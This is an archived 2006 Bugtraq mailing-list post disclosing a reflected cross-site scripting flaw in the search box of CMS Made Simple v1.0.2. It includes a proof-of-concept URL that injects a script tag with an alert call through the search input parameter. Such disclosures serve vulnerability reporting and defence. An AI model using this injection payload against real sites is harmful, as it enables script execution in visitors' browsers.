lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061228143551.27248.qmail@securityfocus.com> Date: 28 Dec 2006 14:35:51 -0000 From: nanoymaster@...il.com To: bugtraq@...urityfocus.com Subject: Re: XSS - CMS Made Simple v1.0.2 I can't remember if I posted another xss found (probably fond by someone else as well but I thought you might like to know) in the search box or url oyu can put xss eg. http://www.target.com/index.php?mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput="><script>alert('hi')</script>&cntnt01submit=Submit obviously this doesn't count for much as it is non permanent... but still enjoy NanoyMaster